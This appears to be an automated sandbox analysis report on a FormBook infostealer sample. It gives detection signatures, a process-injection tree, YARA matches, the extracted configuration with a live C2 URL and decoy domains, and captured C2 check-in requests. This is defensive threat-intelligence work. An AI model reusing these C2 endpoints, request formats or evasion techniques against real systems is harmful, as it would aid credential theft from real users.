Loading ...

Play interactive tourEdit tour

Analysis Report RCS76393.exe

Overview

General Information

Sample Name:RCS76393.exe
Analysis ID:383936
MD5:1ab1c3129fa0764ea0702da70f3ef569
SHA1:ee8cd1946b58390f4599056df1472d01cf85a543
SHA256:5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RCS76393.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
    • RCS76393.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\RCS76393.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.batiktintaemas.com/goei/"], "decoy": ["bet365o2.com", "gulf-landlord.info", "foodsystemsjusticeproject.com", "ronwongart.com", "fwgkdhg.icu", "armanrugservice.com", "mapadequito.com", "vbkulkarni.com", "ltsbinge.com", "creativem2.com", "mindflexlab.com", "ushealthvisa.com", "247carkeyslondon.com", "addthat.xyz", "zanzan8.com", "legendsalliance.net", "shopflyonline.com", "csgo-roll.net", "reutbergcapital.com", "mediaworkhouse.com", "office-tourism-tirana.com", "evecrude.xyz", "sportwillwin.com", "cluskmusk.com", "her2mymeme.com", "rsw3313.com", "digitalmarketingmoves.com", "seaworldminecraft.com", "onlinecollegetherapy.com", "ourmonaca.com", "generalflix.com", "limonproduce.com", "casalomasymphonyorchestra.com", "karyapertama.com", "massaponaxhighschool.com", "covidtracksb.com", "breathharbour.net", "italianrealestateagents.com", "xn--ga-c9a.com", "libreo.club", "leverhump.store", "kevinrsamuels.network", "pimpmyrecipe.com", "win-back.online", "kelasipo.com", "caross-china.com", "ly-iot.com", "nolimitsynthetics.net", "epicfriend.club", "19come.com", "lcjzjt.com", "lxpvccard.com", "distributorfocuson.com", "looneytunesrun.com", "mariebiernacki.com", "maquinaclub.com", "randalldavisauthor.com", "niggeruprising.com", "theexpatweightcoach.com", "mex33.info", "imbravura.com", "baldosasanjose.com", "akindousa.com", "ourmunera.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.RCS76393.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.RCS76393.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.RCS76393.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RCS76393.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.RCS76393.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.batiktintaemas.com/goei/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.batiktintaemas.com/goei/"], "decoy": ["bet365o2.com", "gulf-landlord.info", "foodsystemsjusticeproject.com", "ronwongart.com", "fwgkdhg.icu", "armanrugservice.com", "mapadequito.com", "vbkulkarni.com", "ltsbinge.com", "creativem2.com", "mindflexlab.com", "ushealthvisa.com", "247carkeyslondon.com", "addthat.xyz", "zanzan8.com", "legendsalliance.net", "shopflyonline.com", "csgo-roll.net", "reutbergcapital.com", "mediaworkhouse.com", "office-tourism-tirana.com", "evecrude.xyz", "sportwillwin.com", "cluskmusk.com", "her2mymeme.com", "rsw3313.com", "digitalmarketingmoves.com", "seaworldminecraft.com", "onlinecollegetherapy.com", "ourmonaca.com", "generalflix.com", "limonproduce.com", "casalomasymphonyorchestra.com", "karyapertama.com", "massaponaxhighschool.com", "covidtracksb.com", "breathharbour.net", "italianrealestateagents.com", "xn--ga-c9a.com", "libreo.club", "leverhump.store", "kevinrsamuels.network", "pimpmyrecipe.com", "win-back.online", "kelasipo.com", "caross-china.com", "ly-iot.com", "nolimitsynthetics.net", "epicfriend.club", "19come.com", "lcjzjt.com", "lxpvccard.com", "distributorfocuson.com", "looneytunesrun.com", "mariebiernacki.com", "maquinaclub.com", "randalldavisauthor.com", "niggeruprising.com", "theexpatweightcoach.com", "mex33.info", "imbravura.com", "baldosasanjose.com", "akindousa.com", "ourmunera.net"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RCS76393.exeJoe Sandbox ML: detected
          Source: 3.1.RCS76393.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.RCS76393.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 4x nop then pop edi3_2_0040C326
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 4x nop then pop edi3_1_0040C326
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_030AC326

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.batiktintaemas.com/goei/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.addthat.xyz
          Source: C:\Windows\explorer.exeDNS query: www.evecrude.xyz
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ly-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ronwongart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.pimpmyrecipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.foodsystemsjusticeproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.batiktintaemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.addthat.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.evecrude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
          Source: Joe Sandbox ViewASN Name: MISSDOMAINSE MISSDOMAINSE
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ly-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ronwongart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.pimpmyrecipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.foodsystemsjusticeproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.batiktintaemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.addthat.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.evecrude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ly-iot.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 08 Apr 2021 10:47:16 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
